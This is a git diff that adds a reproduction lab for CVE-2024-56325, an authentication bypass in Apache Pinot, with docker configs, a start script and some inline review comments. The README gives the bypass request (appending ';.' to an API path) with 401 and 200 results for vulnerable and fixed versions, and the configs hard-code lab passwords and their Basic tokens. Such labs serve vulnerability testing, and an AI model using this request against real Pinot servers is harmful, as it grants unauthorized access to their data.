diff --git a/apache/pinot/CVE-2024-56325/README.md b/apache/pinot/CVE-2024-56325/README.md
new file mode 100644
index 00000000..22d5a0ce
--- /dev/null
+++ b/apache/pinot/CVE-2024-56325/README.md
@@ -0,0 +1,27 @@
+# setup vulnerable version
+```bash
+PINOT_VERSION=1.2.0 docker compose up
+```
+## test vulnerable version
+```bash
+curl -v http://localhost:9000/tables
+# 401 Unauthorized
+# {"code":401,"error":"HTTP 401 Unauthorized"}
+curl -v http://localhost:9000/tables\;.
+# 200 OK
+# {"tables":[]}
+```
+
+# setup fixed version
+```bash
+PINOT_VERSION=1.3.0 docker compose up
+```
+## test secure version
+```bash
+curl -v http://localhost:9000/tables
+# 401 Unauthorized
+# {"code":401,"error":"HTTP 401 Unauthorized"}
+curl -v http://localhost:9000/tables\;.
+# 401 Unauthorized
+# {"code":401,"error":"HTTP 401 Unauthorized"}
+```
diff --git a/apache/pinot/CVE-2024-56325/broker.conf b/apache/pinot/CVE-2024-56325/broker.conf
new file mode 100644
index 00000000..0f5e8341
--- /dev/null
+++ b/apache/pinot/CVE-2024-56325/broker.conf
@@ -0,0 +1,14 @@
+# broker settings
+pinot.broker.client.queryPort=8099
+pinot.broker.routing.table.builder.class=random
+pinot.broker.helix.cluster.name=PinotCluster
+pinot.broker.zk.str=127.0.0.1:2181
+# no tokens required
+# the factory class property is different for the broker
+pinot.broker.access.control.class=org.apache.pinot.broker.broker.BasicAuthAccessControlFactory
+
+pinot.broker.access.control.principals=admin,user
+pinot.broker.access.control.principals.admin.password=verysecret
+pinot.broker.access.control.principals.user.password=secret
+
+# No need to set READ permissions here since broker requests are read-only
\ No newline at end of file
diff --git a/apache/pinot/CVE-2024-56325/controller.conf b/apache/pinot/CVE-2024-56325/controller.conf
new file mode 100644
index 00000000..6b7a7594
--- /dev/null
+++ b/apache/pinot/CVE-2024-56325/controller.conf
@@ -0,0 +1,23 @@
+# controller settings
+controller.helix.cluster.name=PinotCluster
+controller.port=9000
+controller.data.dir=/tmp/pinot/controller
+controller.zk.str=127.0.0.1:2181
+controller.host=pinot-controller
+
+# Create users "admin" and "user". Keep in mind we're not enforcing any ACLs yet.
+controller.admin.access.control.principals=admin,user
+
+# Set the user's password to "secret" and allow "READ" only
+controller.admin.access.control.principals.user.password=secret
+controller.admin.access.control.principals.user.permissions=READ
+
+# Set the admin's password to "verysecret"
+controller.admin.access.control.principals.admin.password=verysecret
+
+# Enable the controller to fetch segments by providing the credentials as a token
+controller.segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+
+# "Basic " + base64encode("admin:verysecret")
+
+controller.admin.access.control.factory.class=org.apache.pinot.controller.api.access.BasicAuthAccessControlFactory
\ No newline at end of file
diff --git a/apache/pinot/CVE-2024-56325/docker-compose.yaml b/apache/pinot/CVE-2024-56325/docker-compose.yaml
new file mode 100644
index 00000000..350775dc
--- /dev/null
+++ b/apache/pinot/CVE-2024-56325/docker-compose.yaml
@@ -0,0 +1,17 @@
+services:
+ pinot:
+ image: apachepinot/pinot:${PINOT_VERSION:-1.2.0}
+ container_name: pinot
+ working_dir: /opt/pinot
+ volumes:
+ - ./controller.conf:/opt/pinot/controller.conf:ro
+ - ./broker.conf:/opt/pinot/broker.conf:ro
+ - ./server.conf:/opt/pinot/server.conf:ro
+ - ./minion.conf:/opt/pinot/minion.conf:ro
+ - ./start-pinot.sh:/opt/pinot/start-pinot.sh
+ entrypoint: "/opt/pinot/start-pinot.sh"
+ ports:
+ - "9000:9000"
+ - "8099:8099"
+ - "8098:8098"
+ - "8097:8097"
\ No newline at end of file
diff --git a/apache/pinot/CVE-2024-56325/minion.conf b/apache/pinot/CVE-2024-56325/minion.conf
new file mode 100644
index 00000000..2307d8f3
--- /dev/null
+++ b/apache/pinot/CVE-2024-56325/minion.conf
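Review bot: The comment above `controller.admin.access.control.principals=admin,user` says no ACLs are enforced yet, but `controller.admin.access.control.principals.user.permissions=READ` four lines later does restrict `user`, and `admin` has no permissions line at all, so its effective rights depend on the factory's default — presumably unrestricted, but worth stating rather than leaving implied. Suggested wording: `# Create users "admin" and "user". "user" is limited to READ below; "admin" has no permissions entry and gets the factory default.` The `# "Basic " + base64encode("admin:verysecret")` explanation would also read better directly above the `controller.segment.fetcher.auth.token` line it describes instead of two lines below it.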
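Review bot: The four `ports:` entries bind the controller, broker, server and minion to every host interface, which for a deliberately vulnerable 1.2.0 build means the bypass under test is reachable from the whole LAN as soon as `docker compose up` runs. Prefixing each mapping with the loopback address keeps the lab local without changing the README commands: `- "127.0.0.1:9000:9000"`, and likewise for 8099, 8098 and 8097. The `./start-pinot.sh` mount is also the only volume without `:ro`; adding it keeps the entrypoint consistent with the four config mounts.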
@@ -0,0 +1,6 @@
+# minion settings
+pinot.minion.helix.cluster.name=PinotCluster
+pinot.minion.zk.str=127.0.0.1:2181
+
+segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+task.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
\ No newline at end of file
diff --git a/apache/pinot/CVE-2024-56325/server.conf b/apache/pinot/CVE-2024-56325/server.conf
new file mode 100644
index 00000000..b109a107
--- /dev/null
+++ b/apache/pinot/CVE-2024-56325/server.conf
@@ -0,0 +1,10 @@
+# server settings
+pinot.server.instance.dataDir=/tmp/pinot/server
+pinot.server.instance.segmentTarDir=/tmp/pinot/server/segments
+pinot.server.netty.port=8098
+pinot.server.helix.cluster.name=PinotCluster
+pinot.server.zk.str=127.0.0.1:2181
+
+pinot.server.segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+pinot.server.segment.uploader.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
+pinot.server.instance.auth.token=Basic YWRtaW46dmVyeXNlY3JldA
\ No newline at end of file
diff --git a/apache/pinot/CVE-2024-56325/start-pinot.sh b/apache/pinot/CVE-2024-56325/start-pinot.sh
new file mode 100755
index 00000000..fefc4d47
--- /dev/null
+++ b/apache/pinot/CVE-2024-56325/start-pinot.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+
+nohup ./bin/pinot-admin.sh StartZookeeper -zkPort 2181 > zookeeper.log 2>&1 &
+while ! grep -q 'Start zookeeper at localhost:2181 in thread main' zookeeper.log; do sleep 1; done
+echo "Zookeeper started."
+
+nohup ./bin/pinot-admin.sh StartController -config controller.conf > controller.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' controller.log; do sleep 1; done
+echo "Controller started."
+
+nohup ./bin/pinot-admin.sh StartBroker -config broker.conf > broker.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' broker.log; do sleep 1; done
+echo "Broker started."
+
+nohup ./bin/pinot-admin.sh StartServer -config server.conf > server.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' server.log; do sleep 1; done
+echo "Server started."
+
+nohup ./bin/pinot-admin.sh StartMinion -configFileName minion.conf > minion.log 2>&1 &
+while ! grep -q 'INFO: \[HttpServer\] Started.' minion.log; do sleep 1; done
+echo "Minion started."
+
+tail -f zookeeper.log controller.log broker.log server.log minion.log
\ No newline at end of file
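Review bot: The five `while ! grep -q … ; do sleep 1; done` readiness loops in start-pinot.sh poll the log forever and never check whether the background process is still alive, so a component that exits early (port already bound, wrong config path, JVM failure) leaves the container hanging silently instead of failing with a diagnostic. The five start blocks differ only in subcommand, log name and ready marker, so one helper that captures `$!` after the `nohup … &` and tests `kill -0` on each iteration fixes all of them at once; this assumes pinot-admin.sh stays in the foreground for the lifetime of the component, which is worth confirming against the wrapper. Adding `set -u` at the top and passing the grep pattern after `--` costs nothing and matches the rest of the script's intent.
```shell
#!/bin/bash
set -u

# Launch one pinot component in the background and block until its log shows
# the ready marker, exiting non-zero as soon as the process dies instead.
start_and_wait() {
  local log=$1 marker=$2
  shift 2
  nohup ./bin/pinot-admin.sh "$@" > "$log" 2>&1 &
  local pid=$!
  while ! grep -q -- "$marker" "$log"; do
    if ! kill -0 "$pid" 2>/dev/null; then
      echo "$1 exited before becoming ready; see $log" >&2
      exit 1
    fi
    sleep 1
  done
}

start_and_wait zookeeper.log 'Start zookeeper at localhost:2181 in thread main' StartZookeeper -zkPort 2181
echo "Zookeeper started."
# … unchanged: controller, broker, server and minion follow the same pattern …
```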